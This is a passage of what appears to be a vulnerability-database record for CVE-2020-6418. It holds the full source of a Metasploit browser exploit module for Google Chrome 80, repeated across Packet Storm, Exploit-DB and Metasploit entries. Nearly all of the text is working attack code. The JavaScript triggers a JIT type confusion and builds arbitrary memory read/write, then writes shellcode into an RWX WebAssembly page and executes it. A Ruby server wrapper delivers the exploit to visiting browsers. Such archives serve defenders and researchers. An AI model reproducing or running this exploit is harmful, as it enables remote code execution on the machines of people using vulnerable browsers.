hex(crel_read4(0x15))); \nlet previous_elements = crel_read4(0x14); \n//print(hex(previous_elements)); \n//print(hex(cabs_read4(previous_elements))); \n//print(hex(cabs_read4(previous_elements + 4n))); \ncabs_write4(previous_elements, 0x66554433n); \n//print(hex(cabs_read4(previous_elements))); \n//print(hex(cabs_read4(previous_elements + 4n))); \n \nprint('addrof(float_rel): ' + hex(addrof(float_rel))); \nuint64_aarw[0] = 0x4142434445464748n; \n} \n \nfunction rce() { \nfunction get_wasm_func() { \nvar importObject = { \nimports: { imported_func: arg => print(arg) } \n}; \nbc = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb]; \nwasm_code = new Uint8Array(bc); \nwasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), importObject); \nreturn wasm_mod.exports.exported_func; \n} \n \nlet wasm_func = get_wasm_func(); \n// traverse the JSFunction object chain to find the RWX WebAssembly code page \nlet wasm_func_addr = addrof(wasm_func); \nlet sfi = cabs_read4(wasm_func_addr + 12n) - 1n; \nprint('sfi: ' + hex(sfi)); \nlet WasmExportedFunctionData = cabs_read4(sfi + 4n) - 1n; \nprint('WasmExportedFunctionData: ' + hex(WasmExportedFunctionData)); \n \nlet instance = cabs_read4(WasmExportedFunctionData + 8n) - 1n; \nprint('instance: ' + hex(instance)); \n \nlet wasm_rwx_addr = cabs_read8(instance + 0x68n); \nprint('wasm_rwx_addr: ' + hex(wasm_rwx_addr)); \n \n// write the shellcode to the RWX page \nwhile(shellcode.length % 4 != 0){ \nshellcode += \"\\u9090\"; \n} \n \nlet sc = []; \n \n// convert the shellcode to BigInt \nfor (let i = 0; i < shellcode.length; i += 4) { \nsc.push(BigInt(shellcode.charCodeAt(i)) + BigInt(shellcode.charCodeAt(i + 1) * 0x10000) + BigInt(shellcode.charCodeAt(i + 2) * 0x100000000) + BigInt(shellcode.charCodeAt(i + 3) * 0x1000000000000)); \n} \n \nwriteShellcode(wasm_rwx_addr,sc); \n \nprint('success'); \nwasm_func(); \n} \n \n \nfunction exp() { \nget_arw(); \nrce(); \n} \n \nexp(); \n^ \n \nif datastore['DEBUG_EXPLOIT'] \ndebugjs = %Q^ \nprint = function(arg) { \nvar request = new XMLHttpRequest(); \nrequest.open(\"POST\", \"/print\", false); \nrequest.send(\"\" + arg); \n}; \n^ \njscript = \"#{debugjs}#{jscript}\" \nelse \njscript.gsub!(/\\/\\/.*$/, '') # strip comments \njscript.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') # strip print(*); \nend \n \nhtml = %Q^ \n<html> \n<head> \n<script> \n#{jscript} \n</script> \n</head> \n<body> \n</body> \n</html> \n^ \nsend_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'}) \nend \n \nend \n`\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/156632/chrome_jscreate_sideeffect.rb.txt"}], "exploitdb": [{"lastseen": "2020-03-09T19:36:41", "description": "", "published": "2020-03-09T00:00:00", "type": "exploitdb", "title": "Google Chrome 80 - JSCreate Side-effect Type Confusion (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-6418"], "modified": "2020-03-09T00:00:00", "id": "EDB-ID:48186", "href": "https://www.exploit-db.com/exploits/48186", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Exploit::Remote::HttpServer\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Google Chrome 80 JSCreate side-effect type confusion exploit',\r\n 'Description' => %q{\r\n This module exploits an issue in Google Chrome 80.0.3987.87 (64 bit). The exploit\r\n corrupts the length of a float array (float_rel), which can then be used for out\r\n of bounds read and write on adjacent memory.\r\n The relative read and write is then used to modify a UInt64Array (uint64_aarw)\r\n which is used for read and writing from absolute memory.\r\n The exploit then uses WebAssembly in order to allocate a region of RWX memory,\r\n which is then replaced with the payload shellcode.\r\n The payload is executed within the sandboxed renderer process, so the browser\r\n must be run with the --no-sandbox option for the payload to work correctly.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'Cl\u00e9ment Lecigne', # discovery\r\n 'Istv\u00e1n Kurucsai', # exploit\r\n 'Vignesh S Rao', # exploit\r\n 'timwr', # metasploit copypasta\r\n ],\r\n 'References' => [\r\n ['CVE', '2020-6418'],\r\n ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=1053604'],\r\n ['URL', 'https://blog.exodusintel.com/2020/02/24/a-eulogy-for-patch-gapping'],\r\n ['URL', 'https://ray-cp.github.io/archivers/browser-pwn-cve-2020-6418%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90'],\r\n ],\r\n 'Arch' => [ ARCH_X64 ],\r\n 'DefaultTarget' => 0,\r\n 'Targets' =>\r\n [\r\n ['Windows 10 - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'win'}],\r\n ['macOS - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'osx'}],\r\n ],\r\n 'DisclosureDate' => 'Feb 19 2020'))\r\n register_advanced_options([\r\n OptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information during exploitation\", false]),\r\n ])\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n if datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*}\r\n print_status(\"[*] #{request.body}\")\r\n send_response(cli, '')\r\n return\r\n end\r\n\r\n print_status(\"Sending #{request.uri} to #{request['User-Agent']}\")\r\n escaped_payload = Rex::Text.to_unescape(payload.raw)\r\n jscript = %Q^\r\nvar shellcode = unescape(\"#{escaped_payload}\");\r\n\r\n// HELPER FUNCTIONS\r\nlet conversion_buffer = new ArrayBuffer(8);\r\nlet float_view = new Float64Array(conversion_buffer);\r\nlet int_view = new BigUint64Array(conversion_buffer);\r\nBigInt.prototype.hex = function() {\r\n return '0x' + this.toString(16);\r\n};\r\nBigInt.prototype.i2f = function() {\r\n int_view[0] = this;\r\n return float_view[0];\r\n}\r\nBigInt.prototype.smi2f = function() {\r\n int_view[0] = this << 32n;\r\n return float_view[0];\r\n}\r\nNumber.prototype.f2i = function() {\r\n float_view[0] = this;\r\n return int_view[0];\r\n}\r\nNumber.prototype.f2smi = function() {\r\n float_view[0] = this;\r\n return int_view[0] >> 32n;\r\n}\r\n\r\nNumber.prototype.fhw = function() {\r\n float_view[0] = this;\r\n return int_view[0] >> 32n;\r\n}\r\n\r\nNumber.prototype.flw = function() {\r\n float_view[0] = this;\r\n return int_view[0] & BigInt(2**32-1);\r\n}\r\n\r\nNumber.prototype.i2f = function() {\r\n return BigInt(this).i2f();\r\n}\r\nNumber.prototype.smi2f = function() {\r\n return BigInt(this).smi2f();\r\n}\r\n\r\nfunction hex(a) {\r\n return a.toString(16);\r\n}\r\n\r\n//\r\n// EXPLOIT\r\n//\r\n\r\n// the number of holes here determines the OOB write offset\r\nlet vuln = [0.1, ,,,,,,,,,,,,,,,,,,,,,, 6.1, 7.1, 8.1];\r\nvar float_rel; // float array, initially corruption target\r\nvar float_carw; // float array, used for reads/writes within the compressed heap\r\nvar uint64_aarw; // uint64 typed array, used for absolute reads/writes in the entire address space\r\nvar obj_leaker; // used to implement addrof\r\nvuln.pop();\r\nvuln.pop();\r\nvuln.pop();\r\n\r\nfunction empty() {}\r\n\r\nfunction f(nt) {\r\n // The compare operation enforces an effect edge between JSCreate and Array.push, thus introducing the bug\r\n vuln.push(typeof(Reflect.construct(empty, arguments, nt)) === Proxy ? 0.2 : 156842065920.05);\r\n for (var i = 0; i < 0x10000; ++i) {};\r\n}\r\n\r\nlet p = new Proxy(Object, {\r\n get: function() {\r\n vuln[0] = {};\r\n float_rel = [0.2, 1.2, 2.2, 3.2, 4.3];\r\n float_carw = [6.6];\r\n uint64_aarw = new BigUint64Array(4);\r\n obj_leaker = {\r\n a: float_rel,\r\n b: float_rel,\r\n };\r\n\r\n return Object.prototype;\r\n }\r\n});\r\n\r\nfunction main(o) {\r\n for (var i = 0; i < 0x10000; ++i) {};\r\n return f(o);\r\n}\r\n\r\n// reads 4 bytes from the compressed heap at the specified dword offset after float_rel\r\nfunction crel_read4(offset) {\r\n var qw_offset = Math.floor(offset / 2);\r\n if (offset & 1 == 1) {\r\n return float_rel[qw_offset].fhw();\r\n } else {\r\n return float_rel[qw_offset].flw();\r\n }\r\n}\r\n\r\n// writes the specified 4-byte BigInt value to the compressed heap at the specified offset after float_rel\r\nfunction crel_write4(offset, val) {\r\n var qw_offset = Math.floor(offset / 2);\r\n // we are writing an 8-byte double under the hood\r\n // read out the other half and keep its value\r\n if (offset & 1 == 1) {\r\n temp = float_rel[qw_offset].flw();\r\n new_val = (val << 32n | temp).i2f();\r\n float_rel[qw_offset] = new_val;\r\n } else {\r\n temp = float_rel[qw_offset].fhw();\r\n new_val = (temp << 32n | val).i2f();\r\n float_rel[qw_offset] = new_val;\r\n }\r\n}\r\n\r\nconst float_carw_elements_offset = 0x14;\r\n\r\nfunction cabs_read4(caddr) {\r\n elements_addr = caddr - 8n | 1n;\r\n crel_write4(float_carw_elements_offset, elements_addr);\r\n print('cabs_read4: ' + hex(float_carw[0].f2i()));\r\n res = float_carw[0].flw();\r\n // TODO restore elements ptr\r\n return res;\r\n}\r\n\r\n\r\n// This function provides arbitrary within read the compressed heap\r\nfunction cabs_read8(caddr) {\r\n elements_addr = caddr - 8n | 1n;\r\n crel_write4(float_carw_elements_offset, elements_addr);\r\n print('cabs_read8: ' + hex(float_carw[0].f2i()));\r\n res = float_carw[0].f2i();\r\n // TODO restore elements ptr\r\n return res;\r\n}\r\n\r\n// This function provides arbitrary write within the compressed heap\r\nfunction cabs_write4(caddr, val) {\r\n elements_addr = caddr - 8n | 1n;\r\n\r\n temp = cabs_read4(caddr + 4n | 1n);\r\n print('cabs_write4 temp: '+ hex(temp));\r\n\r\n new_val = (temp << 32n | val).i2f();\r\n\r\n crel_write4(float_carw_elements_offset, elements_addr);\r\n print('cabs_write4 prev_val: '+ hex(float_carw[0].f2i()));\r\n\r\n float_carw[0] = new_val;\r\n // TODO restore elements ptr\r\n return res;\r\n}\r\n\r\nconst objleaker_offset = 0x41;\r\nfunction addrof(o) {\r\n obj_leaker.b = o;\r\n addr = crel_read4(objleaker_offset) & BigInt(2**32-2);\r\n obj_leaker.b = {};\r\n return addr;\r\n}\r\n\r\nconst uint64_externalptr_offset = 0x1b; // in 8-bytes\r\n\r\n// Arbitrary read. We corrupt the backing store of the `uint64_aarw` array and then read from the array\r\nfunction read8(addr) {\r\n faddr = addr.i2f();\r\n t1 = float_rel[uint64_externalptr_offset];\r\n t2 = float_rel[uint64_externalptr_offset + 1];\r\n float_rel[uint64_externalptr_offset] = faddr;\r\n float_rel[uint64_externalptr_offset + 1] = 0.0;\r\n\r\n val = uint64_aarw[0];\r\n\r\n float_rel[uint64_externalptr_offset] = t1;\r\n float_rel[uint64_externalptr_offset + 1] = t2;\r\n return val;\r\n}\r\n\r\n// Arbitrary write. We corrupt the backing store of the `uint64_aarw` array and then write into the array\r\nfunction write8(addr, val) {\r\n faddr = addr.i2f();\r\n t1 = float_rel[uint64_externalptr_offset];\r\n t2 = float_rel[uint64_externalptr_offset + 1];\r\n float_rel[uint64_externalptr_offset] = faddr;\r\n float_rel[uint64_externalptr_offset + 1] = 0.0;\r\n\r\n uint64_aarw[0] = val;\r\n\r\n float_rel[uint64_externalptr_offset] = t1;\r\n float_rel[uint64_externalptr_offset + 1] = t2;\r\n return val;\r\n}\r\n\r\n// Given an array of bigints, this will write all the elements to the address provided as argument\r\nfunction writeShellcode(addr, sc) {\r\n faddr = addr.i2f();\r\n t1 = float_rel[uint64_externalptr_offset];\r\n t2 = float_rel[uint64_externalptr_offset + 1];\r\n float_rel[uint64_externalptr_offset - 1] = 10;\r\n float_rel[uint64_externalptr_offset] = faddr;\r\n float_rel[uint64_externalptr_offset + 1] = 0.0;\r\n\r\n for (var i = 0; i < sc.length; ++i) {\r\n uint64_aarw[i] = sc[i]\r\n }\r\n\r\n float_rel[uint64_externalptr_offset] = t1;\r\n float_rel[uint64_externalptr_offset + 1] = t2;\r\n}\r\n\r\n\r\nfunction get_compressed_rw() {\r\n\r\n for (var i = 0; i < 0x10000; ++i) {empty();}\r\n\r\n main(empty);\r\n main(empty);\r\n\r\n // Function would be jit compiled now.\r\n main(p);\r\n\r\n print(`Corrupted length of float_rel array = ${float_rel.length}`);\r\n}\r\n\r\nfunction get_arw() {\r\n get_compressed_rw();\r\n print('should be 0x2: ' + hex(crel_read4(0x15)));\r\n let previous_elements = crel_read4(0x14);\r\n //print(hex(previous_elements));\r\n //print(hex(cabs_read4(previous_elements)));\r\n //print(hex(cabs_read4(previous_elements + 4n)));\r\n cabs_write4(previous_elements, 0x66554433n);\r\n //print(hex(cabs_read4(previous_elements)));\r\n //print(hex(cabs_read4(previous_elements + 4n)));\r\n\r\n print('addrof(float_rel): ' + hex(addrof(float_rel)));\r\n uint64_aarw[0] = 0x4142434445464748n;\r\n}\r\n\r\nfunction rce() {\r\n function get_wasm_func() {\r\n var importObject = {\r\n imports: { imported_func: arg => print(arg) }\r\n };\r\n bc = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb];\r\n wasm_code = new Uint8Array(bc);\r\n wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), importObject);\r\n return wasm_mod.exports.exported_func;\r\n }\r\n\r\n let wasm_func = get_wasm_func();\r\n // traverse the JSFunction object chain to find the RWX WebAssembly code page\r\n let wasm_func_addr = addrof(wasm_func);\r\n let sfi = cabs_read4(wasm_func_addr + 12n) - 1n;\r\n print('sfi: ' + hex(sfi));\r\n let WasmExportedFunctionData = cabs_read4(sfi + 4n) - 1n;\r\n print('WasmExportedFunctionData: ' + hex(WasmExportedFunctionData));\r\n\r\n let instance = cabs_read4(WasmExportedFunctionData + 8n) - 1n;\r\n print('instance: ' + hex(instance));\r\n\r\n let wasm_rwx_addr = cabs_read8(instance + 0x68n);\r\n print('wasm_rwx_addr: ' + hex(wasm_rwx_addr));\r\n\r\n // write the shellcode to the RWX page\r\n while(shellcode.length % 4 != 0){\r\n shellcode += \"\\u9090\";\r\n }\r\n\r\n let sc = [];\r\n\r\n // convert the shellcode to BigInt\r\n for (let i = 0; i < shellcode.length; i += 4) {\r\n sc.push(BigInt(shellcode.charCodeAt(i)) + BigInt(shellcode.charCodeAt(i + 1) * 0x10000) + BigInt(shellcode.charCodeAt(i + 2) * 0x100000000) + BigInt(shellcode.charCodeAt(i + 3) * 0x1000000000000));\r\n }\r\n\r\n writeShellcode(wasm_rwx_addr,sc);\r\n\r\n print('success');\r\n wasm_func();\r\n}\r\n\r\n\r\nfunction exp() {\r\n get_arw();\r\n rce();\r\n}\r\n\r\nexp();\r\n^\r\n\r\n if datastore['DEBUG_EXPLOIT']\r\n debugjs = %Q^\r\nprint = function(arg) {\r\n var request = new XMLHttpRequest();\r\n request.open(\"POST\", \"/print\", false);\r\n request.send(\"\" + arg);\r\n};\r\n^\r\n jscript = \"#{debugjs}#{jscript}\"\r\n else\r\n jscript.gsub!(/\\/\\/.*$/, '') # strip comments\r\n jscript.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') # strip print(*);\r\n end\r\n\r\n html = %Q^\r\n<html>\r\n<head>\r\n<script>\r\n#{jscript}\r\n</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n ^\r\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})\r\n end\r\n\r\nend", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "sourceHref": "https://www.exploit-db.com/download/48186"}], "metasploit": [{"lastseen": "2020-10-13T16:43:34", "description": "This module exploits an issue in Google Chrome 80.0.3987.87 (64 bit). The exploit corrupts the length of a float array (float_rel), which can then be used for out of bounds read and write on adjacent memory. The relative read and write is then used to modify a UInt64Array (uint64_aarw) which is used for read and writing from absolute memory. The exploit then uses WebAssembly in order to allocate a region of RWX memory, which is then replaced with the payload shellcode. The payload is executed within the sandboxed renderer process, so the browser must be run with the --no-sandbox option for the payload to work correctly.\n", "published": "2020-02-29T10:41:04", "type": "metasploit", "title": "Google Chrome 80 JSCreate side-effect type confusion exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-6418"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/BROWSER/CHROME_JSCREATE_SIDEEFFECT", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Post::File\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Google Chrome 80 JSCreate side-effect type confusion exploit',\n 'Description' => %q{\n This module exploits an issue in Google Chrome 80.0.3987.87 (64 bit). The exploit\n corrupts the length of a float array (float_rel), which can then be used for out\n of bounds read and write on adjacent memory.\n The relative read and write is then used to modify a UInt64Array (uint64_aarw)\n which is used for read and writing from absolute memory.\n The exploit then uses WebAssembly in order to allocate a region of RWX memory,\n which is then replaced with the payload shellcode.\n The payload is executed within the sandboxed renderer process, so the browser\n must be run with the --no-sandbox option for the payload to work correctly.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Cl\u00e9ment Lecigne', # discovery\n 'Istv\u00e1n Kurucsai', # exploit\n 'Vignesh S Rao', # exploit\n 'timwr', # metasploit copypasta\n ],\n 'References' => [\n ['CVE', '2020-6418'],\n ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=1053604'],\n ['URL', 'https://blog.exodusintel.com/2020/02/24/a-eulogy-for-patch-gapping'],\n ['URL', 'https://ray-cp.github.io/archivers/browser-pwn-cve-2020-6418%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90'],\n ],\n 'Arch' => [ ARCH_X64 ],\n 'DefaultTarget' => 0,\n 'Targets' =>\n [\n ['Windows 10 - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'win'}],\n ['macOS - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'osx'}],\n ],\n 'DisclosureDate' => '2020-02-19'))\n register_advanced_options([\n OptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information during exploitation\", false]),\n ])\n end\n\n def on_request_uri(cli, request)\n if datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*}\n print_status(\"[*] #{request.body}\")\n send_response(cli, '')\n return\n end\n\n print_status(\"Sending #{request.uri} to #{request['User-Agent']}\")\n escaped_payload = Rex::Text.to_unescape(payload.raw)\n jscript = %Q^\nvar shellcode = unescape(\"#{escaped_payload}\");\n\n// HELPER FUNCTIONS\nlet conversion_buffer = new ArrayBuffer(8);\nlet float_view = new Float64Array(conversion_buffer);\nlet int_view = new BigUint64Array(conversion_buffer);\nBigInt.prototype.hex = function() {\n return '0x' + this.toString(16);\n};\nBigInt.prototype.i2f = function() {\n int_view[0] = this;\n return float_view[0];\n}\nBigInt.prototype.smi2f = function() {\n int_view[0] = this << 32n;\n return float_view[0];\n}\nNumber.prototype.f2i = function() {\n float_view[0] = this;\n return int_view[0];\n}\nNumber.prototype.f2smi = function() {\n float_view[0] = this;\n return int_view[0] >> 32n;\n}\n\nNumber.prototype.fhw = function() {\n float_view[0] = this;\n return int_view[0] >> 32n;\n}\n\nNumber.prototype.flw = function() {\n float_view[0] = this;\n return int_view[0] & BigInt(2**32-1);\n}\n\nNumber.prototype.i2f = function() {\n return BigInt(this).i2f();\n}\nNumber.prototype.smi2f = function() {\n return BigInt(this).smi2f();\n}\n\nfunction hex(a) {\n return a.toString(16);\n}\n\n//\n// EXPLOIT\n//\n\n// the number of holes here determines the OOB write offset\nlet vuln = [0.1, ,,,,,,,,,,,,,,,,,,,,,, 6.1, 7.1, 8.1];\nvar float_rel; // float array, initially corruption target\nvar float_carw; // float array, used for reads/writes within the compressed heap\nvar uint64_aarw; // uint64 typed array, used for absolute reads/writes in the entire address space\nvar obj_leaker; // used to implement addrof\nvuln.pop();\nvuln.pop();\nvuln.pop();\n\nfunction empty() {}\n\nfunction f(nt) {\n // The compare operation enforces an effect edge between JSCreate and Array.push, thus introducing the bug\n vuln.push(typeof(Reflect.construct(empty, arguments, nt)) === Proxy ? 0.2 : 156842065920.05);\n for (var i = 0; i < 0x10000; ++i) {};\n}\n\nlet p = new Proxy(Object, {\n get: function() {\n vuln[0] = {};\n float_rel = [0.2, 1.2, 2.2, 3.2, 4.3];\n float_carw = [6.6];\n uint64_aarw = new BigUint64Array(4);\n obj_leaker = {\n a: float_rel,\n b: float_rel,\n };\n\n return Object.prototype;\n }\n});\n\nfunction main(o) {\n for (var i = 0; i < 0x10000; ++i) {};\n return f(o);\n}\n\n// reads 4 bytes from the compressed heap at the specified dword offset after float_rel\nfunction crel_read4(offset) {\n var qw_offset = Math.floor(offset / 2);\n if (offset & 1 == 1) {\n return float_rel[qw_offset].fhw();\n } else {\n return float_rel[qw_offset].flw();\n }\n}\n\n// writes the specified 4-byte BigInt value to the compressed heap at the specified offset after float_rel\nfunction crel_write4(offset, val) {\n var qw_offset = Math.floor(offset / 2);\n // we are writing an 8-byte double under the hood\n // read out the other half and keep its value\n if (offset & 1 == 1) {\n temp = float_rel[qw_offset].flw();\n new_val = (val << 32n | temp).i2f();\n float_rel[qw_offset] = new_val;\n } else {\n temp = float_rel[qw_offset].fhw();\n new_val = (temp << 32n | val).i2f();\n float_rel[qw_offset] = new_val;\n }\n}\n\nconst float_carw_elements_offset = 0x14;\n\nfunction cabs_read4(caddr) {\n elements_addr = caddr - 8n | 1n;\n crel_write4(float_carw_elements_offset, elements_addr);\n print('cabs_read4: ' + hex(float_carw[0].f2i()));\n res = float_carw[0].flw();\n // TODO restore elements ptr\n return res;\n}\n\n\n// This function provides arbitrary within read the compressed heap\nfunction cabs_read8(caddr) {\n elements_addr = caddr - 8n | 1n;\n crel_write4(float_carw_elements_offset, elements_addr);\n print('cabs_read8: ' + hex(float_carw[0].f2i()));\n res = float_carw[0].f2i();\n // TODO restore elements ptr\n return res;\n}\n\n// This function provides arbitrary write within the compressed heap\nfunction cabs_write4(caddr, val) {\n elements_addr = caddr - 8n | 1n;\n\n temp = cabs_read4(caddr + 4n | 1n);\n print('cabs_write4 temp: '+ hex(temp));\n\n new_val = (temp << 32n | val).i2f();\n\n crel_write4(float_carw_elements_offset, elements_addr);\n print('cabs_write4 prev_val: '+ hex(float_carw[0].f2i()));\n\n float_carw[0] = new_val;\n // TODO restore elements ptr\n return res;\n}\n\nconst objleaker_offset = 0x41;\nfunction addrof(o) {\n obj_leaker.b = o;\n addr = crel_read4(objleaker_offset) & BigInt(2**32-2);\n obj_leaker.b = {};\n return addr;\n}\n\nconst uint64_externalptr_offset = 0x1b; // in 8-bytes\n\n// Arbitrary read. We corrupt the backing store of the `uint64_aarw` array and then read from the array\nfunction read8(addr) {\n faddr = addr.i2f();\n t1 = float_rel[uint64_externalptr_offset];\n t2 = float_rel[uint64_externalptr_offset + 1];\n float_rel[uint64_externalptr_offset] = faddr;\n float_rel[uint64_externalptr_offset + 1] = 0.0;\n\n val = uint64_aarw[0];\n\n float_rel[uint64_externalptr_offset] = t1;\n float_rel[uint64_externalptr_offset + 1] = t2;\n return val;\n}\n\n// Arbitrary write. We corrupt the backing store of the `uint64_aarw` array and then write into the array\nfunction write8(addr, val) {\n faddr = addr.i2f();\n t1 = float_rel[uint64_externalptr_offset];\n t2 = float_rel[uint64_externalptr_offset + 1];\n float_rel[uint64_externalptr_offset] = faddr;\n float_rel[uint64_externalptr_offset + 1] = 0.0;\n\n uint64_aarw[0] = val;\n\n float_rel[uint64_externalptr_offset] = t1;\n float_rel[uint64_externalptr_offset + 1] = t2;\n return val;\n}\n\n// Given an array of bigints, this will write all the elements to the address provided as argument\nfunction writeShellcode(addr, sc) {\n faddr = addr.i2f();\n t1 = float_rel[uint64_externalptr_offset];\n t2 = float_rel[uint64_externalptr_offset + 1];\n float_rel[uint64_externalptr_offset - 1] = 10;\n float_rel[uint64_externalptr_offset] = faddr;\n float_rel[uint64_externalptr_offset + 1] = 0.0;\n\n for (var i = 0; i < sc.length; ++i) {\n uint64_aarw[i] = sc[i]\n }\n\n float_rel[uint64_externalptr_offset] = t1;\n float_rel[uint64_externalptr_offset + 1] = t2;\n}\n\n\nfunction get_compressed_rw() {\n\n for (var i = 0; i < 0x10000; ++i) {empty();}\n\n main(empty);\n main(empty);\n\n // Function would be jit compiled now.\n main(p);\n\n print(`Corrupted length of float_rel array = ${float_rel.length}`);\n}\n\nfunction get_arw() {\n get_compressed_rw();\n print('should be 0x2: ' + hex(crel_read4(0x15)));\n let previous_elements = crel_read4(0x14);\n //print(hex(previous_elements));\n //print(hex(cabs_read4(previous_elements)));\n //print(hex(cabs_read4(previous_elements + 4n)));\n cabs_write4(previous_elements, 0x66554433n);\n //print(hex(cabs_read4(previous_elements)));\n //print(hex(cabs_read4(previous_elements + 4n)));\n\n print('addrof(float_rel): ' + hex(addrof(float_rel)));\n uint64_aarw[0] = 0x4142434445464748n;\n}\n\nfunction rce() {\n function get_wasm_func() {\n var importObject = {\n imports: { imported_func: arg => print(arg) }\n };\n bc = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb];\n wasm_code = new Uint8Array(bc);\n wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), importObject);\n return wasm_mod.exports.exported_func;\n }\n\n let wasm_func = get_wasm_func();\n // traverse the JSFunction object chain to find the RWX WebAssembly code page\n let wasm_func_addr = addrof(wasm_func);\n let sfi = cabs_read4(wasm_func_addr + 12n) - 1n;\n print('sfi: ' + hex(sfi));\n let WasmExportedFunctionData = cabs_read4(sfi + 4n) - 1n;\n print('WasmExportedFunctionData: ' + hex(WasmExportedFunctionData));\n\n let instance = cabs_read4(WasmExportedFunctionData + 8n) - 1n;\n print('instance: ' + hex(instance));\n\n let wasm_rwx_addr = cabs_read8(instance + 0x68n);\n print('wasm_rwx_addr: ' + hex(wasm_rwx_addr));\n\n // write the shellcode to the RWX page\n while(shellcode.length % 4 != 0){\n shellcode += \"\\u9090\";\n }\n\n let sc = [];\n\n // convert the shellcode to BigInt\n for (let i = 0; i < shellcode.length; i += 4) {\n sc.push(BigInt(shellcode.charCodeAt(i)) + BigInt(shellcode.charCodeAt(i + 1) * 0x10000) + BigInt(shellcode.charCodeAt(i + 2) * 0x100000000) + BigInt(shellcode.charCodeAt(i + 3) * 0x1000000000000));\n }\n\n writeShellcode(wasm_rwx_addr,sc);\n\n print('success');\n wasm_func();\n}\n\n\nfunction exp() {\n get_arw();\n rce();\n}\n\nexp();\n^\n\n if datastore['DEBUG_EXPLOIT']\n debugjs = %Q^\nprint = function(arg) {\n var request = new XMLHttpRequest();\n request.open(\"POST\", \"/print\", false);\n request.send(\"\" + arg);\n};\n^\n jscript = \"#{debugjs}#{jscript}\"\n else\n jscript.gsub!(/\\/\\/.*$/, '') # strip comments\n jscript.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') # strip print(*);\n end\n\n html = 